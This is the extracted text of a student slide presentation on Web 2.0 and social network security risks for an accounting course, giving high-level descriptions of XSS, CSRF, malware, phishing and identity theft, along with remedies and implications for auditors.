slidecast ppt

WEB 2.0/SOCIAL NETWORKS AND SECURITYBy: Sherry Gu

For: ACC626

AGENDA

Definition of Web 2.0 Magnitude on use of Web 2.0/social

networking applications Impacts of Web 2.0/social networks have on

security and security risks Types of security attacks Triggers/motivations behind security attacks Remedies/solutions to security vulnerabilities Implications for accountants

WHAT IS WEB 2.0?

Web 2.0 Conference “Network as Platform” – Web 2.0 “managing, understanding, responding…” “…to massive amount of user generated data…” “…in real time”

MAGNITUDE OF USE

For Businesses: 2008 Survey:

18% of companies use blogs 32% of companies use wikis 23% of companies use RSS-feeds

Forrester Research: Spending on Web 2.0 application: $4.6 billion in 2013

IMPACTS ON SECURITY RISKS

Control/Detection Risk Add complexity to the current system (multiple platforms,

multiple sources) Inherent Risk

Interactive nature Increase in likelihood of leaking confidential data

Statistics: 40% users attacked by malwares and phishing from social

networking sites Ranked as “most serious risk to information security” in

2010 by SMB’s 60% companies believed that employee behaviour on

social networks could endanger network security

XSS ATTACK

Injecting malicious codes into otherwise trusted websites

Gives hackers access to information on browser E.g. “Samy” Attack on MySpace

Add Samy as a friend Add “Samy is my hero” on profile pages One million friend requests

CSRF ATTACK Lure users to open/load malicious links Gives hacker access to already - authenticated

applications Hacker make undesirable

modifications/changes/extractions to applications E.g. Gmail

Malicious codes create email filters that that forward emails to another account

MALWARES/SPYWARES/ADWARES

Malware: worms, viruses, trojan Examples:

Koobface family malware on Youtube and Facebook

Bebloh Trojan: “man-in-the-browser” attack

SPEAR PHISHING

Target specific organizations Seek unauthorized access to confidential data Appearance of sender: more direct relationship

with the victim Social networks: help hackers to build more

complete profile about the sender

IDENTITY THEFT

Researchers from Eurecom Profile cloning Cross-site cloning

Authentication problems

TRIGGERS/MOTIVATIONS

Technical nature: Largely dependent on source codes: e.g. AJAX Open – source Complex scripts and dynamic technology: difficult for

protection software to identify malware signatures

TRIGGERS/MOTIVATIONS

Financial Gain Hack into bank accounts Sell to buyers in the large underground market

Organized crime/bot recruitment Web 2.0 applications are: public, open, scalable,

anonymous

REMEDIES/SOLUTIONS

Employee use policies and education (balance between flexibility and security) Strengthen monitoring and reviewing activities:

extensive logs and audit trails Encryption of user data using public and private

keys

IMPLICATIONS FOR ACCOUNTANTS

Auditors: Assess need for risk assessment

Social network/Web 2.0 strategy, policies, and regulatory compliance requirements

Risk assessment Identify types of risk Analyze threat potential Validate risk ratings Hire IT specialist

ISACA: social media assurance/audit program

CONCLUSION

Heightened security risks Risk assessment is critical Policies and procedures